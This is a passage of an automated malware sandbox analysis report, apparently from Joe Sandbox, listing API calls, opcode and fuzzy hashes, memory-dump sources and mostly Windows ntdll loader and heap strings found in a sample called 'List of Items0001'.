                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-3443045126
                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

                                                Execution Graph

                                                Execution Coverage:0%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:100%
                                                Total number of Nodes:1
                                                Total number of Limit Nodes:0
                                                execution_graph 39717 326a2b90 LdrInitializeThunk

                                                Control-flow Graph

                                                control_flow_graph 2 326a34e0-326a34ec LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8ad7f34358e8244eaeaf09523ea533987f245d150c342c5a8db4109f1420944f
                                                • Instruction ID: 114aeab477aa2c938fb54460e60f7cc5d4766d45ac0076d14af1428cab60b2b7
                                                • Opcode Fuzzy Hash: 8ad7f34358e8244eaeaf09523ea533987f245d150c342c5a8db4109f1420944f
                                                • Instruction Fuzzy Hash: 9090023160520403DD006559571475620054FD0201F61D816A1424628DC7A5895576A2

                                                Control-flow Graph

                                                control_flow_graph 0 326a2b90-326a2b9c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bdd2a381809e241714778ffabab9c4b0432ed2b2213e66681a0e1c16a635e7a3
                                                • Instruction ID: d5c20981039f1883ce83b643c07548c66c2e87e44bdbf647b848eaed58e40191
                                                • Opcode Fuzzy Hash: bdd2a381809e241714778ffabab9c4b0432ed2b2213e66681a0e1c16a635e7a3
                                                • Instruction Fuzzy Hash: 0190023120118803DD106559970479A10054FD0301F55D816A5424718DC6A588957221

                                                Control-flow Graph

                                                control_flow_graph 1 326a2d10-326a2d1c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 69baa80802fbc45b6402cfbd359bfc384b35394d8d5b0adb2ce43c2a3d9063c2
                                                • Instruction ID: 759df320bdb699121444ca480dd6f75b52d06d334498688766e3bdf58256c5b8
                                                • Opcode Fuzzy Hash: 69baa80802fbc45b6402cfbd359bfc384b35394d8d5b0adb2ce43c2a3d9063c2
                                                • Instruction Fuzzy Hash: F290023120110413DD116559570475710094FD0241F91D817A1424618DD6668956B221

                                                Control-flow Graph

                                                Strings
                                                • Invalid debug info address of this critical section, xrefs: 326D52C1
                                                • double initialized or corrupted critical section, xrefs: 326D5313
                                                • 8, xrefs: 326D50EE
                                                • undeleted critical section in freed memory, xrefs: 326D5236
                                                • Critical section debug info address, xrefs: 326D522A, 326D5339
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 326D52ED
                                                • Thread identifier, xrefs: 326D5345
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 326D52D9
                                                • Critical section address., xrefs: 326D530D
                                                • corrupted critical section, xrefs: 326D52CD
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 326D5215, 326D52A1, 326D5324
                                                • Address of the debug info found in the active list., xrefs: 326D52B9, 326D5305
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 326D534E
                                                • Critical section address, xrefs: 326D5230, 326D52C7, 326D533F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: 2513e4b02a74e42b1de30a07fd0fabd88e842001c85dda77722dd56ef947fbff
                                                • Instruction ID: 49532ec17363aa652bf96457a35158bf1bf237ea30eeb2a91eb0898b9d576915
                                                • Opcode Fuzzy Hash: 2513e4b02a74e42b1de30a07fd0fabd88e842001c85dda77722dd56ef947fbff
                                                • Instruction Fuzzy Hash: AE8199B0901348EFEB54CF94CC80BAEBBB9FF48724F204059E945B7640DB71A944CBA4

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.h2
                                                • API String ID: 0-994927039
                                                • Opcode ID: d9e8c5557cfa995e3cdd1ec217a6adeb6df20ccf09495b8254061a7946db4063
                                                • Instruction ID: 3b30f81be67b50483e72ab5ddfc9148719d59dc98c29dcc270757a21126677f7
                                                • Opcode Fuzzy Hash: d9e8c5557cfa995e3cdd1ec217a6adeb6df20ccf09495b8254061a7946db4063
                                                • Instruction Fuzzy Hash: 08B18AB59083419FD715CF24C890B5FBBE8AF88758F60492EF98597281EB70DD48CB92

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: bb2813ddd36ea78b355ec3c199258fa47d64bde621e2394724bddf50b921af3b
                                                • Instruction ID: 0e85d8ce55d6a828c80cd9baa67b1f5d2491e6a87d4707972b27480b8706d13c
                                                • Opcode Fuzzy Hash: bb2813ddd36ea78b355ec3c199258fa47d64bde621e2394724bddf50b921af3b
                                                • Instruction Fuzzy Hash: 4051F0B15143019BD326CF14A941BABB7E9FF84354F04891DFA98CB180EB70E608CF9A

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                • API String ID: 3446177414-1745908468
                                                • Opcode ID: 02f0ed2df1cff909d8a3a1ae6703eae892ab3d8b7d34bd13eb879f170f5a05ec
                                                • Instruction ID: 541270c1efc7b9393ff593481914a3b12865034438c3824d77308b1b6011e0e7
                                                • Opcode Fuzzy Hash: 02f0ed2df1cff909d8a3a1ae6703eae892ab3d8b7d34bd13eb879f170f5a05ec
                                                • Instruction Fuzzy Hash: 0891FD35901645DFDB02CFA8C840A9EFBF2FF49324F28844AE844AB251CF7A9946CF55

                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 3265651C
                                                  • Part of subcall function 32656565: RtlDebugPrintTimes.NTDLL ref: 32656614
                                                  • Part of subcall function 32656565: RtlDebugPrintTimes.NTDLL ref: 3265665F
                                                Strings
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 326B97B9
                                                • LdrpInitShimEngine, xrefs: 326B9783, 326B9796, 326B97BF
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 326B9790
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 326B977C
                                                • apphelp.dll, xrefs: 32656446
                                                • minkernel\ntdll\ldrinit.c, xrefs: 326B97A0, 326B97C9
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-204845295
                                                • Opcode ID: fda7f551fb2ac8d5785e438dd4bef888344c13457578a5da9077e200df8b0158
                                                • Instruction ID: eb8cb2fac95fc37f1de47e6664f12f691c76b92b9c8c861edee9c1a1ff1c7ce8
                                                • Opcode Fuzzy Hash: fda7f551fb2ac8d5785e438dd4bef888344c13457578a5da9077e200df8b0158
                                                • Instruction Fuzzy Hash: 7651DE716493449BE714CF21C890A9BB7E8FF84758F600D29F685976A0DA70D944CF92
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 3268D879
                                                  • Part of subcall function 32664779: RtlDebugPrintTimes.NTDLL ref: 32664817
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-1975516107
                                                • Opcode ID: e438a065582b1e4fd742f9847970b2c8e84265ab86d2255d2f26d6b4b29a3160
                                                • Instruction ID: 0fefb860523af9b0ffb933173718b1eb1adb6117ec80a50f02dbdb72bf74cfcb
                                                • Opcode Fuzzy Hash: e438a065582b1e4fd742f9847970b2c8e84265ab86d2255d2f26d6b4b29a3160
                                                • Instruction Fuzzy Hash: BB51E1B6A45345DFEB08CFB4C48478DFBB1BF44758F204459D8017B282DBB4A986CBA1
                                                Strings
                                                • HandleTraces, xrefs: 326E890F
                                                • VerifierDebug, xrefs: 326E8925
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 326E86BD
                                                • VerifierFlags, xrefs: 326E88D0
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 326E86E7
                                                • VerifierDlls, xrefs: 326E893D
                                                • AVRF: -*- final list of providers -*- , xrefs: 326E880F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 1b965909a0808be561d173147a03d3066ce5d06480d6ab2ed59104c2ee160739
                                                • Instruction ID: 4da0ace04c1b6c2c254f35016c65edb7b3f0892dee486e0291f0b85b4d860f41
                                                • Opcode Fuzzy Hash: 1b965909a0808be561d173147a03d3066ce5d06480d6ab2ed59104c2ee160739
                                                • Instruction Fuzzy Hash: 4C9146B2943751EFE711CF289A80B5BB7A8FF40758F550858F9926B260CB709C05CBDA
                                                Strings
                                                • LdrpDynamicShimModule, xrefs: 326CA7A5
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 326CA79F
                                                • minkernel\ntdll\ldrinit.c, xrefs: 326CA7AF
                                                • DGc2, xrefs: 32682382
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DGc2$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2742881860
                                                • Opcode ID: 65d0dc6c171c2512defddfd949fe1c17d3b6c3cf07c0c23511f367c4e957321f
                                                • Instruction ID: 4e94c46687bdebc77c1cd4d396893b1b414596888617345e7a50d8b5a3f9fd6f
                                                • Opcode Fuzzy Hash: 65d0dc6c171c2512defddfd949fe1c17d3b6c3cf07c0c23511f367c4e957321f
                                                • Instruction Fuzzy Hash: 0E31287AA41250EBF714AF58CC91A5ABBB5FF80B54F340469E902B7250DBB46C82CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: ddb7c4b5d1b649255e847b03f1af502fdabbb828c5525ffdbd6ca1c20ac05056
                                                • Instruction ID: 646942ac5d2019d3179a4e80c4564198e4c54ec778f45343b6a22fe66ccee9ee
                                                • Opcode Fuzzy Hash: ddb7c4b5d1b649255e847b03f1af502fdabbb828c5525ffdbd6ca1c20ac05056
                                                • Instruction Fuzzy Hash: 144200752083819FE709CF29C484B1ABBE9FF89348F24496DE885CB352DB74D841CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.h2
                                                • API String ID: 0-3823411657
                                                • Opcode ID: 329207771ea2c8359197c0b9b0702b2e8adc0b799d7ac490541b91d1f3c9211d
                                                • Instruction ID: 9fab64c9c5cd564bbb7bccf6547f1bb6f1ec080b880af1f4d6630e033f69b78e
                                                • Opcode Fuzzy Hash: 329207771ea2c8359197c0b9b0702b2e8adc0b799d7ac490541b91d1f3c9211d
                                                • Instruction Fuzzy Hash: BAF14BB6D01218EFDB15DF98C9A0ADEBBB8EF48750F51416AE501E7210EB709E01CBA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-122214566
                                                • Opcode ID: eb571a0cea0564fa6bc5a62a99e536c9ac08180078ff9f1d8115352c8365c5a6
                                                • Instruction ID: f432d9c186a5f396d134049f2181d00bf37e2b8b7be7678de15dd894ca119758
                                                • Opcode Fuzzy Hash: eb571a0cea0564fa6bc5a62a99e536c9ac08180078ff9f1d8115352c8365c5a6
                                                • Instruction Fuzzy Hash: 50C16774A01355ABEB198B68E8D0BBEB7A1EF45318F50416DEC11EB290EFB4CC84C391
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 84d74101ff92d2d1d0b558c6b01f3a6f7b834a145c4735dcc8f265377cecc04a
                                                • Instruction ID: 2645c9f4d26e1834ece003e5d31ed6bc4f214211b50f43670015b93360bb8b90
                                                • Opcode Fuzzy Hash: 84d74101ff92d2d1d0b558c6b01f3a6f7b834a145c4735dcc8f265377cecc04a
                                                • Instruction Fuzzy Hash: 41914771A42399DBF728CF54C944BDEBBA0BF41B68F600469E9156B280DFB05C42CF96
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: d6dcf75f8dd47dd2d6d6bbd1c09640750ecdd082f1d43d534c2a71a5643be7b3
                                                • Instruction ID: 739b245ea7a9698346e6441dbb8a0222d499297436a030901e8237b1e56be039
                                                • Opcode Fuzzy Hash: d6dcf75f8dd47dd2d6d6bbd1c09640750ecdd082f1d43d534c2a71a5643be7b3
                                                • Instruction Fuzzy Hash: EFF1AF74A00B45DFEB09CF68D894B6AB7B5FF84344F204199E8169B381DB74E981CFA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 3446177414-2283098728
                                                • Opcode ID: 823e33f06cabf38ddb6031437f65e29b2357bcb4e700d3c0f1c37bf459435984
                                                • Instruction ID: 54a342fd134c9905c95b44bc58bfe226ec22cfaf6ca0b53ef46bf117d24237f6
                                                • Opcode Fuzzy Hash: 823e33f06cabf38ddb6031437f65e29b2357bcb4e700d3c0f1c37bf459435984
                                                • Instruction Fuzzy Hash: 675125717027029FE714DF38C884B1AB7A1BF84314F240E6DE9529B791EB70E845CB96
                                                APIs
                                                Strings
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 326D80E9
                                                • minkernel\ntdll\ldrinit.c, xrefs: 326D80F3
                                                • Failed to reallocate the system dirs string !, xrefs: 326D80E2
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-1783798831
                                                • Opcode ID: 0fd1821d9b5bf9d051ed9b647e989b695064cba0c03aa9f80771f5b04f548e3b
                                                • Instruction ID: 3dae273bd6cddf26352945151a6d44d1fe432ffe4f7c3d32745c5de0b831fa2c
                                                • Opcode Fuzzy Hash: 0fd1821d9b5bf9d051ed9b647e989b695064cba0c03aa9f80771f5b04f548e3b
                                                • Instruction Fuzzy Hash: A641E2B5542300ABD720EF64DC44B8BB7E8FF89760F20592AF848A7250EF70D841CB96
                                                APIs
                                                Strings
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 326E4519
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 326E4508
                                                • LdrpCheckRedirection, xrefs: 326E450F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 3446177414-3154609507
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                • API String ID: 0-3061284088
                                                APIs
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32660586
                                                • kLsE, xrefs: 326605FE
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 3446177414-2547482624
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                Strings
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3269847E
